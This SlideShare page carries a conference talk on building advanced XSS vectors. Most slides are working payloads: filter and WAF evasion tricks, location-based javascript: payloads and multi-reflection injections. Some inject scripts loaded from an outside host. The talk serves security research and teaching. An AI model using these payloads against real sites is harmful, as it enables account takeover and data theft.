SlideShare a Scribd company logo

Building Advanced XSS Vectors

R
Rodolfo Assis (Brute)

XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog

Technology
1 of 61
Download to read offline
Building Advanced XSS Vectors by @brutelogic
About
About - Agenda ● About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
About - Speaker ● Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
About - Presentation ● Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
Vector Scheme
Vector Scheme ● Regular <tag handler=code> Example: <svg onload=alert(1)>
Vector Scheme ● Full extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
Vector Builder (webGun) http://brutelogic.com.br/webgun
Vector Builder (webGun) ● Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
Agnostic Event Handlers
Agnostic Event Handlers ● Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
Agnostic Event Handlers - List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
Agnostic Event Handlers ● Example: <brute onclick=alert(1)>clickme!
Reusing Native Code
Reusing Native Code ● Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
Reusing Native Code ● Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
Reusing Native Code ● Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
Reusing Native Code ● Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
Filter Bypass
Filter Bypass - Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
Filter Bypass - Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
Filter Bypass - Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
Location Based Payloads
Location Based Payloads ● Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
Location Based Payloads - Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
Location Based Payloads - Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
Location Based Payloads - Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
Location Based Payloads - Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
Location Based Payloads - Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
Location Based Payloads - Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
Location Based Payloads - Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
Location Based Payloads - Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
Location Based Payloads - Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
Location Based Payloads - Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
Location Based Payloads - Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
Multi Reflection
Multi Reflection - Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
Multi Reflection - Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
Multi Reflection - Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
Conclusion ● XSS vectors can: - be complex; - easily evade filters; - blow your mind.
Thanks! @brutelogic

Recommended

XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 

Recommended

XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
Ssrf
SsrfSsrf
SsrfIlan Mindel
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSДмитрий Бумов
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 

More Related Content

What's hot

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 

What's hot (20)

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
 
Ssrf
SsrfSsrf
Ssrf
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 

Viewers also liked

The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick GalbreathCODE BLUE
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
JavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeJavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeNishant Das Patnaik
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Pengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKPengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKMuhammad Yusuf
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionBart Leppens
 
{{more}} Kibana4
{{more}} Kibana4{{more}} Kibana4
{{more}} Kibana4琛琳 饶
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012_mr_me
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)__x86
 
Apache安装配置mod security
Apache安装配置mod securityApache安装配置mod security
Apache安装配置mod securityHuang Toby
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
 

Viewers also liked (20)

The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
